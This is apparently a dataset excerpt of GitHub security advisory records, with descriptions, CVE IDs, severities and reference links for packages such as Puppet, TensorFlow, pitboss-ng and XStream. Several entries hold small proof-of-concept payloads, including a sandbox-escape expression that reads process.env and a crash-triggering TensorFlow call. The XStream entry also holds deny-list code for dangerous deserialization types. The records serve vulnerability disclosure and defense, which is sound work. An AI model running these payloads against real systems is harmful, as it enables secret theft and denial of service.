'https://lists.apache.org/thread.html/rae81e0c8ebdf47ffaa85a01240836bfece8a990c48f55c7933162b5c@%3Cdev.atlas.apache.org%3E', 'https://lists.apache.org/thread.html/re3cd7cb641d7fc6684e4fc3c336a8bad4a01434bb5625a06e3600fd1@%3Cissues.nifi.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0805', 'https://github.com/advisories/GHSA-6phf-73q6-gh87', 'https://lists.apache.org/thread.html/rec74f3a94dd850259c730b4ba6f7b6211222b58900ec088754aa0534@%3Cissues.nifi.apache.org%3E', 'https://lists.apache.org/thread.html/rb1f76c2c0a4d6efb8a3523974f9d085d5838b73e7bffdf9a8f212997@%3Cissues.nifi.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00007.html', 'http://mail-archives.apache.org/mod_mbox/www-announce/201908.mbox/%3cC628798F-315D-4428-8CB1-4ED1ECC958E4@apache.org%3e', 'https://lists.apache.org/thread.html/r18d8b4f9263e5cad3bbaef0cdba0e2ccdf9201316ac4b85e23eb7ee4@%3Cdev.atlas.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIUYSL2RSIWZVNSUIXJTIFPIPIF6OAIO/', 'https://access.redhat.com/errata/RHSA-2020:0057', 'https://lists.apache.org/thread.html/rb8dac04cb7e9cc5dedee8dabaa1c92614f590642e5ebf02a145915ba@%3Ccommits.atlas.apache.org%3E', 'https://lists.apache.org/thread.html/rcc029be4edaaf5b8bb85818aab494e16f312fced07a0f4a202771ba2@%3Cissues.nifi.apache.org%3E', 'https://lists.apache.org/thread.html/r43de02fd4a4f52c4bdeff8c02f09625d83cd047498009c1cdab857db@%3Cdev.rocketmq.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://lists.apache.org/thread.html/r306c0322aa5c0da731e03f3ce9f07f4745c052c6b73f4e78faf232ca@%3Cdev.atlas.apache.org%3E', 'https://lists.apache.org/thread.html/r2d5f1d88c39bd615271abda63964a0bee9b2b57fef1f84cb4c43032e@%3Cissues.nifi.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0806', 'https://www.oracle.com//security-alerts/cpujul2021.html'}
| null |
GHSA
|
GHSA-g89m-3wjw-h857
|
Low severity vulnerability that affects puppet
|
Directory traversal vulnerability in lib/puppet/reports/store.rb in Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet Enterprise before 2.5.2, when Delete is enabled in auth.conf, allows remote authenticated users to delete arbitrary files on the puppet master server via a .. (dot dot) in a node name.
|
{'CVE-2012-3865'}
|
2021-09-10T20:29:08Z
|
2017-10-24T18:33:37Z
|
LOW
| 0
|
{'CWE-22'}
|
{'http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00006.html', 'https://github.com/advisories/GHSA-g89m-3wjw-h857', 'https://bugzilla.redhat.com/show_bug.cgi?id=839131', 'https://github.com/puppetlabs/puppet/commit/554eefc55f57ed2b76e5ee04d8f194d36f6ee67f', 'https://nvd.nist.gov/vuln/detail/CVE-2012-3865', 'https://github.com/puppetlabs/puppet/commit/d80478208d79a3e6d6cb1fbc525e24817fe8c4c6', 'http://lists.opensuse.org/opensuse-updates/2012-07/msg00036.html', 'http://www.ubuntu.com/usn/USN-1506-1', 'http://secunia.com/advisories/50014', 'http://puppetlabs.com/security/cve/cve-2012-3865/', 'http://www.debian.org/security/2012/dsa-2511'}
| null |
GHSA
|
GHSA-35m5-8cvj-8783
|
Improper hashing in enrocrypt
|
### Impact
The vulnerability is we used MD5 hashing Algorithm In our hashing file. If anyone who is a beginner(and doesn't know about hashes) can face problems as MD5 is considered a Insecure Hashing Algorithm.
### Patches
The vulnerability is patched in v1.1.4 of the product, the users can upgrade to version 1.1.4.
### Workarounds
If u specifically want a version and don't want to upgrade, you can remove the `MD5` hashing function from the file `hashing.py` and this vulnerability will be gone
### References
https://www.cybersecurity-help.cz/vdb/cwe/916/
https://www.cybersecurity-help.cz/vdb/cwe/327/
https://www.cybersecurity-help.cz/vdb/cwe/328/
https://www.section.io/engineering-education/what-is-md5/
https://www.johndcook.com/blog/2019/01/24/reversing-an-md5-hash/
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [**Enrocrypt's Official Repo**](http://www.github.com/Morgan-Phoenix/EnroCrypt)
* Create a Discussion in [**Enrocrypt's Official Repo**](http://www.github.com/Morgan-Phoenix/EnroCrypt)
|
{'CVE-2021-39182'}
|
2021-11-10T16:28:46Z
|
2021-11-10T16:28:46Z
|
HIGH
| 7.5
|
{'CWE-327', 'CWE-916', 'CWE-328'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-39182', 'https://github.com/advisories/GHSA-35m5-8cvj-8783', 'https://github.com/Morgan-Phoenix/EnroCrypt/commit/e652d56ac60eadfc26489ab83927af13a9b9d8ce', 'https://github.com/Morgan-Phoenix/EnroCrypt/security/advisories/GHSA-35m5-8cvj-8783'}
| null |
GHSA
|
GHSA-3gpc-w23c-w59w
|
Sandbox Breakout / Arbitrary Code Execution in pitboss-ng
|
All versions of `pitboss-ng` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through `this.constructor.constructor` . This may allow attackers to execute arbitrary code in the system. Evaluating the payload `this.constructor.constructor('return process.env')()` prints the contents of `process.env`.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
| null |
2021-04-21T19:45:42Z
|
2020-09-04T15:02:06Z
|
CRITICAL
| 0
| null |
{'https://github.com/advisories/GHSA-3gpc-w23c-w59w', 'https://www.npmjs.com/advisories/1319'}
| null |
GHSA
|
GHSA-qfhg-m6r8-xxpj
|
Incorrect Authorization in Drupal core
|
The QuickEdit module does not properly check access to fields in some circumstances, which can lead to unintended disclosure of field data. Sites are only affected if the QuickEdit module (which comes with the Standard profile) is installed.
|
{'CVE-2020-13676'}
|
2022-02-26T00:24:46Z
|
2022-02-12T00:00:46Z
|
MODERATE
| 6.5
|
{'CWE-863', 'CWE-284'}
|
{'https://www.drupal.org/sa-core-2021-009', 'https://github.com/advisories/GHSA-qfhg-m6r8-xxpj', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13676'}
| null |
GHSA
|
GHSA-mrhj-2g4v-39qx
|
Moderate severity vulnerability that affects rails-html-sanitizer
|
Withdrawn, accidental duplicate publish.
Cross-site scripting (XSS) vulnerability in the rails-html-sanitizer gem 1.0.2 for Ruby on Rails 4.2.x and 5.x allows remote attackers to inject arbitrary web script or HTML via an HTML entity that is mishandled by the Rails::Html::FullSanitizer class.
| null |
2021-12-03T14:25:08Z
|
2018-09-17T21:58:19Z
|
MODERATE
| 0
| null |
{'https://github.com/advisories/GHSA-mrhj-2g4v-39qx', 'https://nvd.nist.gov/vuln/detail/CVE-2015-7579'}
| null |
GHSA
|
GHSA-fxqh-cfjm-fp93
|
Division by 0 in `Reverse`
|
### Impact
An attacker can cause a denial of service via a FPE runtime error in `tf.raw_ops.Reverse`:
```python
import tensorflow as tf
tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32)
dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool)
tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)
```
This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/36229ea9e9451dac14a8b1f4711c435a1d84a594/tensorflow/core/kernels/reverse_op.cc#L75-L76) performs a division based on the first dimension of the tensor argument:
```cc
const int64 N = input.dim_size(0);
const int64 cost_per_unit = input.NumElements() / N;
```
Since this is controlled by the user, an attacker can trigger a denial of service.
### Patches
We have patched the issue in GitHub commit [4071d8e2f6c45c1955a811fee757ca2adbe462c1](https://github.com/tensorflow/tensorflow/commit/4071d8e2f6c45c1955a811fee757ca2adbe462c1).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
|
{'CVE-2021-29556'}
|
2021-05-21T14:24:39Z
|
2021-05-21T14:24:39Z
|
LOW
| 2.5
|
{'CWE-369'}
|
{'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fxqh-cfjm-fp93', 'https://github.com/tensorflow/tensorflow/commit/4071d8e2f6c45c1955a811fee757ca2adbe462c1', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29556', 'https://github.com/advisories/GHSA-fxqh-cfjm-fp93'}
| null |
GHSA
|
GHSA-94hh-pjjg-rwmr
|
Padding Oracle Attack due to Observable Timing Discrepancy in jose-browser-runtime
|
### Impact
[AES_CBC_HMAC_SHA2 Algorithm](https://tools.ietf.org/html/rfc7518#section-5.2) (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDecryptionFailed` would be thrown. But a possibly observable difference in timing when padding error would occur while decrypting the ciphertext makes a padding oracle and an adversary might be able to make use of that oracle to decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block).
### Patches
A patch was released which ensures the HMAC tag is verified before performing CBC decryption. The fixed versions are `>=3.11.4`.
Users should upgrade to `^3.11.4`.
### Credits
Thanks to Morgan Brown of Microsoft for bringing this up and Eva Sarafianou (@esarafianou) for helping to score this advisory.
|
{'CVE-2021-29444'}
|
2021-04-19T18:30:21Z
|
2021-04-19T14:58:49Z
|
MODERATE
| 5.9
|
{'CWE-203'}
|
{'https://github.com/advisories/GHSA-94hh-pjjg-rwmr', 'https://github.com/panva/jose/security/advisories/GHSA-94hh-pjjg-rwmr', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29444', 'https://www.npmjs.com/package/jose-browser-runtime'}
| null |
GHSA
|
GHSA-xc3p-ff3m-f46v
|
Insecure input handling in Flask-Cors
|
An issue was discovered in Flask-CORS (aka CORS Middleware for Flask) before 3.0.9. It allows ../ directory traversal to access private resources because resource matching does not ensure that pathnames are in a canonical format.
|
{'CVE-2020-25032'}
|
2022-04-29T20:27:29Z
|
2021-05-06T18:51:48Z
|
HIGH
| 7.5
|
{'CWE-22'}
|
{'https://github.com/advisories/GHSA-xc3p-ff3m-f46v', 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00032.html', 'https://github.com/corydolphin/flask-cors/releases/tag/3.0.9', 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00039.html', 'https://github.com/corydolphin/flask-cors/commit/67c4b2cc98ae87cf1fa7df4f97fd81b40c79b895', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25032', 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00048.html', 'https://www.debian.org/security/2020/dsa-4775', 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00028.html'}
| null |
GHSA
|
GHSA-pp75-xfpw-37g9
|
Prototype pollution in grpc and @grpc/grpc-js
|
"The package grpc before 1.24.4 and the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition."
|
{'CVE-2020-7768'}
|
2021-07-29T20:41:45Z
|
2021-05-10T19:16:14Z
|
HIGH
| 7.5
|
{'CWE-915'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7768', 'https://github.com/grpc/grpc-node/pull/1606', 'https://github.com/grpc/grpc-node/pull/1605', 'https://github.com/grpc/grpc-node/releases/tag/grpc%401.24.4', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038819', 'https://www.npmjs.com/package/grpc', 'https://www.npmjs.com/package/@grpc/grpc-js', 'https://snyk.io/vuln/SNYK-JS-GRPCGRPCJS-1038818', 'https://snyk.io/vuln/SNYK-JS-GRPC-598671', 'https://github.com/advisories/GHSA-pp75-xfpw-37g9'}
| null |
GHSA
|
GHSA-f599-5m7p-hcpf
|
Moderate severity vulnerability that affects grape
|
The grape rubygem suffers from a cross-site scripting (XSS) vulnerability via "format" parameter.
|
{'CVE-2018-3769'}
|
2021-01-08T18:54:26Z
|
2018-08-13T20:45:32Z
|
MODERATE
| 0
|
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-f599-5m7p-hcpf', 'https://github.com/ruby-grape/grape/issues/1762', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3769', 'https://github.com/ruby-grape/grape/pull/1763', 'https://github.com/ruby-grape/grape/commit/6876b71efc7b03f7ce1be3f075eaa4e7e6de19af'}
| null |
GHSA
|
GHSA-vqcm-7f7f-r539
|
brbackup exposes database password to unauthorized users
|
lib/brbackup.rb in the brbackup gem 0.1.1 for Ruby places the database password on the mysql command line, which allows local users to obtain sensitive information by listing the process.
|
{'CVE-2014-5004'}
|
2022-04-25T22:09:41Z
|
2018-03-05T19:32:06Z
|
HIGH
| 7.8
|
{'CWE-200'}
|
{'http://www.securityfocus.com/bid/68506', 'https://github.com/advisories/GHSA-vqcm-7f7f-r539', 'http://www.openwall.com/lists/oss-security/2014/07/10/6', 'https://nvd.nist.gov/vuln/detail/CVE-2014-5004', 'http://www.openwall.com/lists/oss-security/2014/07/17/5', 'http://www.vapid.dhs.org/advisories/brbackup-0.1.1.html'}
| null |
GHSA
|
GHSA-vmp5-c5hp-6c65
|
Woodpecker allows cross-site scripting (XSS) via build logs
|
Woodpecker before 0.15.1 allows XSS via build logs because web/src/components/repo/build/BuildLog.vue lacks escaping.
|
{'CVE-2022-29947'}
|
2022-05-03T20:18:09Z
|
2022-04-30T00:00:33Z
|
MODERATE
| 0
|
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-29947', 'https://github.com/woodpecker-ci/woodpecker/releases/tag/v0.15.1', 'https://github.com/advisories/GHSA-vmp5-c5hp-6c65', 'https://github.com/woodpecker-ci/woodpecker/pull/879'}
| null |
GHSA
|
GHSA-f7qw-5pvg-mmwp
|
Prototype Pollution in lutils-merge
|
All versions of `lutils-merge` are vulnerable to Prototype Pollution. The merge() function fails to prevent user input to alter an Object's prototype, allowing attackers to modify override properties of all objects in the application. This may lead to Denial of Service or may be chained with other vulnerabilities leading to Remote Code Execution.
## Recommendation
The package is deprecated and no fixes are available. Consider using an alternative package.
| null |
2021-08-16T15:30:52Z
|
2019-06-13T18:58:44Z
|
MODERATE
| 7.3
|
{'CWE-400'}
|
{'https://github.com/nfour/lutils-merge/issues/1', 'https://hackerone.com/reports/439107', 'https://snyk.io/vuln/SNYK-JS-LUTILSMERGE-174783', 'https://www.npmjs.com/advisories/893', 'https://github.com/advisories/GHSA-f7qw-5pvg-mmwp'}
| null |
GHSA
|
GHSA-wqvq-5m8c-6g24
|
CRLF injection
|
urllib3 before 1.25.9 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of putrequest(). NOTE: this is similar to CVE-2020-26116.
|
{'CVE-2020-26137'}
|
2021-10-21T20:49:58Z
|
2021-06-18T18:46:43Z
|
MODERATE
| 6.5
|
{'CWE-74'}
|
{'https://github.com/urllib3/urllib3/commit/1dd69c5c5982fae7c87a620d487c2ebf7a6b436b', 'https://bugs.python.org/issue39603', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.debian.org/debian-lts-announce/2021/06/msg00015.html', 'https://usn.ubuntu.com/4570-1/', 'https://github.com/advisories/GHSA-wqvq-5m8c-6g24', 'https://github.com/urllib3/urllib3/pull/1800', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26137'}
| null |
GHSA
|
GHSA-r4x2-3cq5-hqvp
|
The defaults settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins
|
The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.
|
{'CVE-2018-8014'}
|
2022-04-27T13:38:43Z
|
2018-10-17T16:32:32Z
|
CRITICAL
| 9.8
|
{'CWE-1188'}
|
{'http://www.securityfocus.com/bid/104203', 'http://tomcat.apache.org/security-7.html', 'http://www.securitytracker.com/id/1041888', 'https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:0451', 'https://lists.apache.org/thread.html/fbfb713e4f8a4c0f81089b89450828011343593800cae3fb629192b1@%3Cannounce.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E', 'http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html', 'http://www.securitytracker.com/id/1040998', 'https://access.redhat.com/errata/RHSA-2018:3768', 'https://lists.debian.org/debian-lts-announce/2018/06/msg00008.html', 'https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:0450', 'https://lists.apache.org/thread.html/ac51944aef91dd5006b8510b0bef337adaccfe962fb90e7af9c22db4@%3Cissues.activemq.apache.org%3E', 'https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20181018-0002/', 'https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E', 'https://github.com/advisories/GHSA-r4x2-3cq5-hqvp', 'https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:2205', 'https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2018:2469', 'http://tomcat.apache.org/security-8.html', 'https://www.debian.org/security/2019/dsa-4596', 'https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html', 'https://access.redhat.com/errata/RHSA-2019:1529', 'https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://access.redhat.com/errata/RHSA-2018:2470', 'https://seclists.org/bugtraq/2019/Dec/43', 'https://nvd.nist.gov/vuln/detail/CVE-2018-8014', 'https://usn.ubuntu.com/3665-1/', 'http://tomcat.apache.org/security-9.html'}
| null |
GHSA
|
GHSA-f6f2-3w33-54r9
|
Use After Free in rusqlite
|
An issue was discovered in the rusqlite crate 0.25.x before 0.25.4 and 0.26.x before 0.26.2 for Rust. create_aggregate_function has a use-after-free.
|
{'CVE-2021-45714'}
|
2022-01-07T16:14:06Z
|
2022-01-06T22:02:36Z
|
HIGH
| 7.5
|
{'CWE-416'}
|
{'https://github.com/advisories/GHSA-f6f2-3w33-54r9', 'https://nvd.nist.gov/vuln/detail/CVE-2021-45714', 'https://rustsec.org/advisories/RUSTSEC-2021-0128.html', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/rusqlite/RUSTSEC-2021-0128.md'}
| null |
GHSA
|
GHSA-f865-m6cq-j9vx
|
ReDOS in Mpmath
|
A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in Mpmath v1.0.0 when the mpmathify function is called.
|
{'CVE-2021-29063'}
|
2021-11-18T15:17:54Z
|
2021-08-09T20:44:51Z
|
HIGH
| 7.5
|
{'CWE-770'}
|
{'https://github.com/fredrik-johansson/mpmath/commit/c811b37c65a4372a7ce613111d2a508c204f9833', 'https://github.com/fredrik-johansson/mpmath/issues/548', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EIUX3XWY2K3MSO7QXMZXQQYAURARSPC5/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29063', 'https://github.com/npm/hosted-git-info/pull/76', 'https://www.npmjs.com/package/hosted-git-info', 'https://github.com/advisories/GHSA-f865-m6cq-j9vx', 'https://github.com/yetingli/PoCs/blob/main/CVE-2021-29063/Mpmath.md', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3M5O55E7VUDMXCPQR6MQTOIFDKHP36AA/', 'https://github.com/yetingli/SaveResults/blob/main/js/hosted-git-info.js', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MS2U6GLXQSRZJE2HVUAUMVFR2DWQLCZG/'}
| null |
GHSA
|
GHSA-26gr-cvq3-qxgf
|
Improper Authentication in Apache Shiro
|
Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.
|
{'CVE-2020-1957'}
|
2022-04-01T20:23:53Z
|
2021-05-07T15:53:18Z
|
CRITICAL
| 9.8
|
{'CWE-287'}
|
{'https://lists.debian.org/debian-lts-announce/2020/04/msg00014.html', 'https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E', 'https://github.com/advisories/GHSA-26gr-cvq3-qxgf', 'https://lists.apache.org/thread.html/r17f371fc89d34df2d0c8131473fbc68154290e1be238895648f5a1e6%40%3Cdev.shiro.apache.org%3E', 'https://lists.apache.org/thread.html/rb3982edf8bc8fcaa7a308e25a12d294fb4aac1f1e9d4e14fda639e77@%3Cdev.geode.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1957', 'https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E', 'https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E', 'https://lists.apache.org/thread.html/rc64fb2336683feff3580c3c3a8b28e80525077621089641f2f386b63@%3Ccommits.camel.apache.org%3E'}
| null |
GHSA
|
GHSA-f768-8pvq-mm6r
|
Business Logic Errors in dolibarr/dolibarr
|
Dolibarr 14.0.5 and prior versions are vulnerable to Business Logic Errors.
|
{'CVE-2022-0414'}
|
2022-02-07T21:10:24Z
|
2022-02-01T22:01:47Z
|
MODERATE
| 4.3
| null |
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0414', 'https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684', 'https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f', 'https://github.com/advisories/GHSA-f768-8pvq-mm6r'}
| null |
GHSA
|
GHSA-562c-5r94-xh97
|
The Pallets Project in flask that can result in large amount of memory usage
|
The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3.
|
{'CVE-2018-1000656'}
|
2022-04-26T18:25:42Z
|
2018-08-23T19:10:40Z
|
HIGH
| 7.5
|
{'CWE-20'}
|
{'https://usn.ubuntu.com/4378-1/', 'https://lists.debian.org/debian-lts-announce/2019/08/msg00025.html', 'https://github.com/pallets/flask/pull/2691', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000656', 'https://github.com/advisories/GHSA-562c-5r94-xh97', 'https://github.com/pallets/flask/releases/tag/0.12.3', 'https://security.netapp.com/advisory/ntap-20190221-0001/'}
| null |
GHSA
|
GHSA-362x-34h3-h6h6
|
Downloads Resources over HTTP in box2d-native
|
Affected versions of `box2d-native` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `box2d-native`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10617'}
|
2021-01-08T20:04:04Z
|
2019-02-18T23:56:48Z
|
HIGH
| 0
|
{'CWE-311'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10617', 'https://www.npmjs.com/advisories/219', 'https://nodesecurity.io/advisories/219', 'https://github.com/advisories/GHSA-362x-34h3-h6h6'}
| null |
GHSA
|
GHSA-h6mq-3cj6-h738
|
Reverse Tabnabbing in showdown
|
Versions of `showdown` prior to 1.9.1 are vulnerable to [Reverse Tabnabbing](https://www.owasp.org/index.php/Reverse_Tabnabbing). The package uses `target='_blank'` in anchor tags, allowing attackers to access `window.opener` for the original page when opening links. This is commonly used for phishing attacks.
## Recommendation
Upgrade to version 1.9.1 or later.
| null |
2021-10-01T16:12:37Z
|
2020-09-03T23:21:16Z
|
LOW
| 3.1
|
{'CWE-1022'}
|
{'https://www.npmjs.com/advisories/1302', 'https://snyk.io/vuln/SNYK-JS-SHOWDOWN-469487', 'https://github.com/showdownjs/showdown/pull/670/files', 'https://github.com/advisories/GHSA-h6mq-3cj6-h738'}
| null |
GHSA
|
GHSA-4cch-wxpw-8p28
|
Server-Side Forgery Request can be activated unmarshalling with XStream
|
### Impact
The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream.
### Patches
If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.15.
### Workarounds
The reported vulnerability does not exist running Java 15 or higher.
No user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability.
Users of XStream 1.4.14 or below who still insist to use XStream default blacklist - despite that clear recommendation - can use a workaround depending on their version in use.
Users of XStream 1.4.14 can simply add two lines to XStream's setup code:
```Java
xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
```
Users of XStream 1.4.14 to 1.4.13 can simply add three lines to XStream's setup code:
```Java
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
```
Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from scratch and deny at least the following types: _javax.imageio.ImageIO$ContainsFilter_, _java.beans.EventHandler_, _java.lang.ProcessBuilder_, _jdk.nashorn.internal.objects.NativeString.class_, _java.lang.Void_ and _void_ and deny several types by name pattern.
```Java
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, "jdk.nashorn.internal.objects.NativeString", java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
```
Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:
```Java
xstream.registerConverter(new Converter() {
public boolean canConvert(Class type) {
return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
|| type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
|| type == java.lang.Void.class || void.class || Proxy.isProxy(type))
|| type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
}
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
}, XStream.PRIORITY_LOW);
```
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
